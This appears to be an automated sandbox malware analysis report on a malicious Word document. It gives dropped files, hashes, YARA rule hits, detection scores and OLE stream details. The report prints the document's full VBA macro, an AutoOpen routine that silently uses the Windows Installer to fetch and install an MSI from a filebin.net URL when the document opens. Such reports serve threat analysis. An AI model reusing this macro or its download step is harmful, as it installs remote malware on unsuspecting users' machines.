                                                                  SHA-256:C1A2B5412658B2EDD4F423C35439CF69DFFCAD442AA2D786672A925ACAE064E7
                                                                  SHA-512:0C7723B855F42C78018352BB2533A2B4CD484352A4DECCD7AC5C2D19F067F6448F6E14DFCE182AC8129C091531E4E04B33B3DEF63562967F3D068A04F2D9C86C
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1, Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, Author: Nils Kuhnert
                                                                  • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, Author: Florian Roth
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0.............................................................................../...............#................... ...!...".......$...%...&...'...(...)...*...+...,...-.......1...........2...................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\~DFECA159C20646BB57.TMP

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):0.14963723887749986
                                                                  Encrypted:false
                                                                  SSDEEP:48:6o6vwrfddSsPiK3ddSH9ZauSiCPiKe6NPiK:Wvq3/OAWiFt
                                                                  MD5:AC6A84118D10D91CB02AE02773436BFF
                                                                  SHA1:A630E822DD052856EDF8D5068E39C683F5BD5644
                                                                  SHA-256:EF15F83FD5723D8FB1470F93EAE79E858F4DDE5081A2EDE2B9271D915325C478
                                                                  SHA-512:84AC382BF232FF446F404024FF1CE14AEA8BFD33F7B4CFECC119FDEBD627F5C8ECBD7091047E4D2093730BCF9A63F282E847BF4729610C8D2BD3E43E2C0D521E
                                                                  Malicious:false
                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\12543_0008858249_FWDOUTSTANDING_20200604.LNK

                                                                  Download File
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:53 2022, mtime=Tue Mar 8 15:45:53 2022, atime=Wed Apr 20 15:19:12 2022, length=62976, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):1164
                                                                  Entropy (8bit):4.5147077000165785
                                                                  Encrypted:false
                                                                  SSDEEP:24:88/XThOMPG/xfm+oeK8vvBlD+5Dv3qaqtT7qtk:88/XT4xxfRoH8iQaqlqG
                                                                  MD5:7ADD8F1D611B2857204C2BC42CC44A28
                                                                  SHA1:AC6C1E2E73C4AD815192F3229B2EB587FB9F1CAA
                                                                  SHA-256:E9A69AB15E044FE4045CF020AF86328465BDA02B387F8E6CC404D115E27A69A8
                                                                  SHA-512:626CE7ADFDD6F4B40A404599EC44B79EB95E42D0B6C7B0B21F0F4C6A4F2FC47AB74AE33E9732C0D9AE3A1EFE3E4521C0393E786604362425C20FEDF31F2A97A8
                                                                  Malicious:false
                                                                  Preview:L..................F.... ...E....3..E....3...{._.T...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......Tg. .12543_~1.DOC.........hT..hT..*...r.....'...............1.2.5.4.3._.0.0.0.8.8.5.8.2.4.9._.F.W.D.O.U.T.S.T.A.N.D.I.N.G._.2.0.2.0.0.6.0.4...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\179605\Users.user\Desktop\12543_0008858249_FWDOUTSTANDING_20200604.doc.C.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.2.5.4.3._.0.0.0.8.8.5.8.2.4.9._.F.W.D.O.U.T.S.T.A.N.D.I.N.G._.2.0.2.0.0.6.0.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                  Download File
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):131
                                                                  Entropy (8bit):4.970285316783502
                                                                  Encrypted:false
                                                                  SSDEEP:3:bDuMJlBPddqc6Kw7XVLR6YVomX1UXWddqc6Kw7XVLR6YVov:bCUPddqc6N7Xy4cXWddqc6N7Xy4y
                                                                  MD5:AC465E397B58BF09906407F06803641B
                                                                  SHA1:91C663F69C167B45184DB10BE2368073F56B7DD6
                                                                  SHA-256:9F3CFAB15CF36A28AFD1552EEEF61449EBD28BEC40F42BA88E2FD86859F3D023
                                                                  SHA-512:C0BCF40F37E7FAAB60C4822663B95F232003CDF8B701444B741AFB5271410C1FFBC9F76E1D8879470D6A35E557C5C2D370513E993CF7CB626A9750A31B03F65C
                                                                  Malicious:false
                                                                  Preview:[folders]..Templates.LNK=0..12543_0008858249_FWDOUTSTANDING_20200604.LNK=0..[doc]..12543_0008858249_FWDOUTSTANDING_20200604.LNK=0..

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                  Download File
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):162
                                                                  Entropy (8bit):2.503835550707525
                                                                  Encrypted:false
                                                                  SSDEEP:3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l
                                                                  MD5:C5E24006AFAC8C2659023AD09A07EB0F
                                                                  SHA1:4B7B834BEDADFD0A2764743E021D40C55A51F284
                                                                  SHA-256:7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
                                                                  SHA-512:673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396
                                                                  Malicious:false
                                                                  Preview:.user..................................................A.l.b.u.s.............p........16..............26.............@36..............36.....z.......p46.....x...

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2L3NA9KPRDQMPGEYZP5Y.temp

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8016
                                                                  Entropy (8bit):3.582679871894779
                                                                  Encrypted:false
                                                                  SSDEEP:96:chQCwMqKqvsqvJCwoEz8hQCwMqKqvsEHyqvJCwor6zYeYnHnxyNplUVWxL:c2joEz823Hnor6zYBxyNLxL
                                                                  MD5:DB998D75757CC341EFFADCB32C3A3537
                                                                  SHA1:77438083A9494757CB358471A9D01C1C81010DAA
                                                                  SHA-256:799694B7C9152F99776FE63DC6D0FDB46C41D411BD67814980F38F8CAE40181D
                                                                  SHA-512:1D2834BB1B0BD037AC058E53A93FA9B13854F686AF6CC36536ADD22B4C648787854587C8E42FC4523ED681C3F4D448214D88883A9AC848DB07FF8CB834DCBA51
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8016
                                                                  Entropy (8bit):3.582679871894779
                                                                  Encrypted:false
                                                                  SSDEEP:96:chQCwMqKqvsqvJCwoEz8hQCwMqKqvsEHyqvJCwor6zYeYnHnxyNplUVWxL:c2joEz823Hnor6zYBxyNLxL
                                                                  MD5:DB998D75757CC341EFFADCB32C3A3537
                                                                  SHA1:77438083A9494757CB358471A9D01C1C81010DAA
                                                                  SHA-256:799694B7C9152F99776FE63DC6D0FDB46C41D411BD67814980F38F8CAE40181D
                                                                  SHA-512:1D2834BB1B0BD037AC058E53A93FA9B13854F686AF6CC36536ADD22B4C648787854587C8E42FC4523ED681C3F4D448214D88883A9AC848DB07FF8CB834DCBA51
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CRATQOCQH2NC42QQ51D9.temp

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8016
                                                                  Entropy (8bit):3.582679871894779
                                                                  Encrypted:false
                                                                  SSDEEP:96:chQCwMqKqvsqvJCwoEz8hQCwMqKqvsEHyqvJCwor6zYeYnHnxyNplUVWxL:c2joEz823Hnor6zYBxyNLxL
                                                                  MD5:DB998D75757CC341EFFADCB32C3A3537
                                                                  SHA1:77438083A9494757CB358471A9D01C1C81010DAA
                                                                  SHA-256:799694B7C9152F99776FE63DC6D0FDB46C41D411BD67814980F38F8CAE40181D
                                                                  SHA-512:1D2834BB1B0BD037AC058E53A93FA9B13854F686AF6CC36536ADD22B4C648787854587C8E42FC4523ED681C3F4D448214D88883A9AC848DB07FF8CB834DCBA51
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                  C:\Users\user\Desktop\~$543_0008858249_FWDOUTSTANDING_20200604.doc

                                                                  Download File
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):162
                                                                  Entropy (8bit):2.503835550707525
                                                                  Encrypted:false
                                                                  SSDEEP:3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l
                                                                  MD5:C5E24006AFAC8C2659023AD09A07EB0F
                                                                  SHA1:4B7B834BEDADFD0A2764743E021D40C55A51F284
                                                                  SHA-256:7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
                                                                  SHA-512:673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396
                                                                  Malicious:false
                                                                  Preview:.user..................................................A.l.b.u.s.............p........16..............26.............@36..............36.....z.......p46.....x...

                                                                  C:\Windows\Installer\535fae.ipi

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.6013944557991673
                                                                  Encrypted:false
                                                                  SSDEEP:48:Ks0AcDHPbuKPiKqQsddSH9ZauSiCPiKejddSsPiKVrpvWo:KsFb6qQ6OAWiq3Pv
                                                                  MD5:7C98B8E591E539177CC02866DD0D4140
                                                                  SHA1:620B461823FAF2BBF8F2E9124DA2878D73CF7849
                                                                  SHA-256:4BA4989BE7C8A499EA5EAB02CA287ECCF89A5BED08F075BE412142776E2B8721
                                                                  SHA-512:D3E8357262B3884D6C3AA5318070566DB3720AEA6E8D741CB6133DCF90102A8C3174CB369BEEE949CF4E10A7D911D48E3051E474CA32F07C4730FCC195297567
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Installer\MSI5B5A.tmp

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 11.0.18362.1, Subject: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {4982A61C-946D-4168-809C-13FF99C4C351}, Create Time/Date: Thu Feb 18 21:32:30 2021, Last Saved Time/Date: Thu Feb 18 21:32:30 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: MSI Wrapper (10.0.50.0), Security: 2
                                                                  Category:dropped
                                                                  Size (bytes):491520
                                                                  Entropy (8bit):6.791342319398629
                                                                  Encrypted:false
                                                                  SSDEEP:6144:cytOIiRQYpgjpjew5LLyGx1qo8yppyN90PEGUEpKy/90QEc:cytMRQ+gjpjegLyo8Cy90V4w90i
                                                                  MD5:260BEC1B34CE96E5ED6C42D51E7146FB
                                                                  SHA1:57EC75201B4957B5C9F4266264E4A3C953255801
                                                                  SHA-256:29C51CD98EAE68D4E63941C8CE41EEDAC2FB18500CD00388EE8D29619CA3F160
                                                                  SHA-512:A8AED798334A8BD35802E3166823D434B292036D5F0BBBE9E2F3587A660F856FF0CE918C8665BD88FCF443BFFA816FDC8EF0D4B13DC5A00CC82D8DC77F50919C
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Installer\MSI9F1.tmp

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):212992
                                                                  Entropy (8bit):6.513444216841171
                                                                  Encrypted:false
                                                                  SSDEEP:3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
                                                                  MD5:4CAAA03E0B59CA60A3D34674B732B702
                                                                  SHA1:EE80C8F4684055AC8960B9720FB108BE07E1D10C
                                                                  SHA-256:D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
                                                                  SHA-512:25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\Logs\DPX\setupact.log

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):969
                                                                  Entropy (8bit):4.307877893758803
                                                                  Encrypted:false
                                                                  SSDEEP:24:a+m2H6Kb2Y76Kb2H6Kb2Y76Kb2Y6m2+m2H6Kb2Y76Kb2Y6r:ck6Kb96Kbk6Kb96Kbb4k6Kb96KbA
                                                                  MD5:B193C14C2275982386C9C24BE523ED52
                                                                  SHA1:DFAABC4AC43E7A77882BADE797F5415C6494CF3A
                                                                  SHA-256:0A685AF3940988A82CE8310FFE0166E9488CF0A20B1A8D4028362E4B305C73C3
                                                                  SHA-512:606C8EF4FE9AFF788D76B1457D3A309010A0AB6426F27F92658AC44C717EF0D05B8CAE8D20F11F1348178633A0492513D1A9CE4765C3291681D833EA4C1F8BFE
                                                                  Malicious:false
                                                                  Preview:.2022-04-20 09:19:26, Info DPX Started DPX phase: Resume and Download Job..2022-04-20 09:19:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Resume and Download Job..2022-04-20 09:19:26, Info DPX Started DPX phase: Resume and Download Job..2022-04-20 09:19:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Resume and Download Job..

                                                                  Static File Info

                                                                  General

                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 20 03:06:00 2022, Last Saved Time/Date: Wed Apr 20 03:06:00 2022, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
                                                                  Entropy (8bit):6.071377383201628
                                                                  TrID:
                                                                  • Microsoft Word document (32009/1) 54.23%
                                                                  • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                  File name:12543_0008858249_FWDOUTSTANDING_20200604.doc
                                                                  File size:61952
                                                                  MD5:090e1dfdcbf2185788ea14cd113cc39f
                                                                  SHA1:6346e143368edbb5a23c8eea9698be2c266311b3
                                                                  SHA256:3bd5892cdc82dc4576eaf2735edb57182ae8b91c8067be305d4e801197d390cc
                                                                  SHA512:d4c9b997909b7bfa87090204a4a97179e61c98c10be73000ec68e32af8feddee19ca8c2bc0e9bf9e3cf040d6e0f4f58f2e0f09eef2936528d1f34c506dbb2e98
                                                                  SSDEEP:768:cAuIiy1a9Tq1aBs8jCjuHF7Y89AOEUYqyxrINSrCqxw+tCc27I/:cAFMm1aidiFk89ABrbr1xrt/2
                                                                  TLSH:65535CDDF2C2C4BBE12942B5E983C7A6B3BC3E292D1293172574371F3C75924C661269
                                                                  File Content Preview:........................>.......................h...........k...............g..................................................................................................................................................................................

                                                                  File Icon

                                                                  Icon Hash:e4eea2aaa4b4b4a4

                                                                  Static OLE Info

                                                                  General

                                                                  Document Type:OLE
                                                                  Number of OLE Files:1

                                                                  OLE File "12543_0008858249_FWDOUTSTANDING_20200604.doc"

                                                                  Indicators
                                                                  Has Summary Info:
                                                                  Application Name:Microsoft Office Word
                                                                  Encrypted Document:False
                                                                  Contains Word Document Stream:True
                                                                  Contains Workbook/Book Stream:False
                                                                  Contains PowerPoint Document Stream:False
                                                                  Contains Visio Document Stream:False
                                                                  Contains ObjectPool Stream:False
                                                                  Flash Objects Count:0
                                                                  Contains VBA Macros:True
                                                                  Summary
                                                                  Code Page:1252
                                                                  Title:
                                                                  Subject:
                                                                  Author:
                                                                  Keywords:
                                                                  Comments:
                                                                  Template:Normal.dotm
                                                                  Last Saved By:
                                                                  Revion Number:1
                                                                  Total Edit Time:0
                                                                  Create Time:2022-04-20 02:06:00
                                                                  Last Saved Time:2022-04-20 02:06:00
                                                                  Number of Pages:1
                                                                  Number of Words:0
                                                                  Number of Characters:1
                                                                  Creating Application:Microsoft Office Word
                                                                  Security:0
                                                                  Document Summary
                                                                  Document Code Page:1252
                                                                  Number of Lines:1
                                                                  Number of Paragraphs:1
                                                                  Thumbnail Scaling Desired:False
                                                                  Contains Dirty Links:False
                                                                  Shared Document:False
                                                                  Changed Hyperlinks:False
                                                                  Application Version:1048576

                                                                  Streams with VBA

                                                                  VBA File Name: ThisDocument.cls, Stream Size: 1773
                                                                  General
                                                                  Stream Path:Macros/VBA/ThisDocument
                                                                  VBA File Name:ThisDocument.cls
                                                                  Stream Size:1773
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . k . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 1c 03 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 23 03 00 00 0b 05 00 00 00 00 00 00 01 00 00 00 bf 6b 0f 39 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  VBA Code
                                                                  Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Dim msi As Object
Set msi = CreateObject("WindowsInstaller.Installer")
msi.UILevel = 2
' the second Property param may require some troubleshooting / testing https://docs.microsoft.com/en-us/windows/win32/msi/action
msi.InstallProduct "https://filebin.net/rf43v6qzghbj7h7b/TRY.msi", ""
End Sub

                                                                  Streams

                                                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                  General
                                                                  Stream Path:\x1CompObj
                                                                  File Type:data
                                                                  Stream Size:114
                                                                  Entropy:4.2359563651
                                                                  Base64 Encoded:True
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                  General
                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                  File Type:data
                                                                  Stream Size:4096
                                                                  Entropy:0.229954151382
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 0b 00 00 00 01 00 00 00 60 00 00 00 05 00 00 00 68 00 00 00 06 00 00 00 70 00 00 00 11 00 00 00 78 00 00 00 17 00 00 00 80 00 00 00 0b 00 00 00 88 00 00 00 10 00 00 00 90 00 00 00 13 00 00 00 98 00 00 00 16 00 00 00 a0 00 00 00
                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                  General
                                                                  Stream Path:\x5SummaryInformation
                                                                  File Type:data
                                                                  Stream Size:4096
                                                                  Entropy:0.414636097734
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 8 . . . . . . . D . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 64 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 bc 00 00 00 06 00 00 00 c8 00 00 00 07 00 00 00 d4 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f4 00 00 00
                                                                  Stream Path: 1Table, File Type: data, Stream Size: 7133
                                                                  General
                                                                  Stream Path:1Table
                                                                  File Type:data
                                                                  Stream Size:7133
                                                                  Entropy:5.86601132644
                                                                  Base64 Encoded:True
